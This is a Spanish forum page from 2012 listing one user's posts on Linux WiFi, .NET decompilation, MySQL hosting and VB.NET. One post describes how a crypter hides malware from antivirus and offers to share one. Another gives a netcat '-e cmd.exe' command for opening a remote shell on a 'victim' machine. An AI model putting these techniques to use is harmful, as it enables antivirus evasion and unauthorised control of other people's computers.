Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - kub0x

#1181
GNU/Linux / Re: backtrack 5 r1 bad password failed
4 Noviembre 2012, 13:00 PM
Prueba a reinstalar wicd, sino busca como conectarte utilIzando iwconfig y dhclient. A ver si la forma manual da resultado.

Saludos!
#1182
GNU/Linux / Re: backtrack 5 r1 bad password failed
4 Noviembre 2012, 04:04 AM
Al parecer el Wicd en la nueva versión r3 no es capaz de conectar con redes WEP. Si no es el caso, ¿probaste a introducir la clave en ASCII o HEX y desactivando DHCP e introduciendo la IP, netmask y DNS manualmente?

Saludos!
#1183
Ingeniería Inversa / Seguridad de un programa
3 Noviembre 2012, 21:13 PM
Buenas noches a todos!

Como no sé si esto va en la sección de Ing. Inversa, .NET o seguridad pues me he decantado por la primera.

Estoy preocupado porque programo en .NET y todos sabemos que en nuestros programas, cuando eramos novatillos pues incluiamos información confidencial que no quisieramos que personas ajenas obtuvieran. He probado algun decompilador de .NET (Reflector, DotNet Resolver...) y he podido decompilar todo mi proyecto, ya sean .exe o .dll, ASUSTA! Vengo con los deberes hechos, pues leí algo sobre seguridad aplicada a programas en el blog de Karmany (Packers, métodos alternativos para generación de información sensible..) y lo estudiaré más a fondo cuando tenga que lanzar la aplicación.

Hay plugins para Visual Studio que ofuscan el Source del programa, pero recientemente he encontrado Desofuscadores para distintas versiones conocidas de ofuscadores, por lo que si ofuscase el programa, el código ofuscado lo podría desofuscar y obtendría el original. Es como si cada medida de seguridad tuviera una contramedida :P

Ya pensé en incluir la información confidencial en .dll, ensamblados cargados en la ejecucción del programa, archivos cifrados, pero ¿Cómo sé que un cracker no pueda descifrar el source para luego acceder a dicha info? ¿Qué métodos puedo emplear para aumentar la seguridad de mis programas?

Gracias por vuestra atención,

Saludos!
#1184
@Niensueños: si buscas que tu programa sea indetectable necesitas que el código del malware esté cifrado. Por lo tanto debes de incluir un programa antes del codigo de tu malware, el cual pueda descifrar dicho codigo malicioso y ejecutarlo en la memoria.

De esta manera tendrás el Stub + Firma + Programa dentro del virus resultante. El Stub va delante del codigo del malware, después tenemos la Firma y al final añadimos el codigo del virus, de esta manera el Stub se ejecutará primero y si encontró la Firma en su codigo entonces descifrará el código del virus, que está justo debajo de la firma y acto seguido lo ejecutará.

Así a bote pronto es como funciona un Crypter. Se puede extender muchisimo y se le pueden añadir las opciones de añadir ciertas funcionalidades al ejecutable resultante, ya lo ire implementando en un tiempo.

Estoy programando un Crypter, pues quiero estar seguro de que sea 100% indetectable frente a un AV, si estás interesado contacta conmigo.
#1185
Cita de: spiritdead en 26 Octubre 2012, 23:38 PM
remote es raro, encontrar y de buena calidad la verdad la mayoria no permite amenos q pagues

Sólo tienes que buscarlo, te aseguro que lo encuentras. Eso si, hay muchos tipos de restricciones ya que hace poco encontré cierta Web que solo ofrece hosting de DB con la posibilidad de conexion remota, pero en lo que administracion se refiere pues no tiene PhpMyAdmin y los credenciales de la DB nos los da la propia Web.
#1186
Olvidate pues 000webhost no acepta conexiones remotas en MySQL, a no ser que hayas ordenado un pago para el servicio premium hehehe.

Busca un poquito en google sobre sitios que acepten MySQL remoto y encontraras a patadas.

Saludos!
#1187
Visual Studio no es más que una suite de aplicaciones para el desarrollo de programas en .NET. Personalmente utilizo la versión Express 2010 de VB, pues no necesito el resto de apps que trae Visual Studio.

Las versiones Express no traen más que lo necesario para programar en cierto lenguaje de .NET (C#, VB.NET, ASP.NET, Visual C++ ...), Visual Studio tiene todos los lenguajes incluidos y segun que versión de Visual Studio hayas descargado, pues incluye programas añadidos (instaladores...), pero eso depende de si los necesitas o no. En mi caso, tiro con la express como ya dije.

Saludos!
#1188
Hacking / Re: PUERTO ESCUCHA NETCAT
26 Octubre 2012, 01:33 AM
Entiendo que lo que quieres hacer es conectarte a la víctima mediante NetCat y que ésta actuará de servidor, pues la estas dejando a la escucha.

En netcat -> nc -L [Tu_IP] -p [Puerto] -e [comando]

-L Deja a la escucha NetCat en el puerto aunque se produzca una desconexion (escucha permanente)
-p Puerto en el que se quedara "escuchando"
-e Comando a ejecutar cuando se produzca la conexión (-e cmd.exe ejecutará la mitica Shell Remota)

Donde pone [Tu_IP] introduce tu IP si quieres que la victima acepte sólo peticiones de tu IP sobre dicho puerto. Si no introduces ninguna IP pues aceptará conexiones de cualquier IP sobre el puerto especificado.

Saludos!
#1189
¿Y el source?
#1190
Podrias hacerlo de dos maneras:

1ª - > Si chrome es el navegador predeterminado del equipo entonces tienes que crear un proceso que ejecute la URL.

Código (VB.NET) [Seleccionar]

Imports System.Diagnostics 'Añades el espacio de nombres System.Diagnostics al principio del code (para poder utilizar sus clases)
'...

Process.Start("http://url") 'Abrirá dicha URL desde el navegador predeterminado


2ª -> Si Chrome está presente en el equipo pero no es el navegador predeterminado

Código (VB.NET) [Seleccionar]

Imports System.Diagnostics
'... métodos de la clase, declaraciones y demás

Process.Start("Ruta del Chrome", "http://url") 'No es mas que lo anterior pero añadiendole la ruta del navegador a ejecutar
' Tambien se le añade por argumento la URL de la WEB que tu quieras abrir.


Espero que te sirva,

Saludos!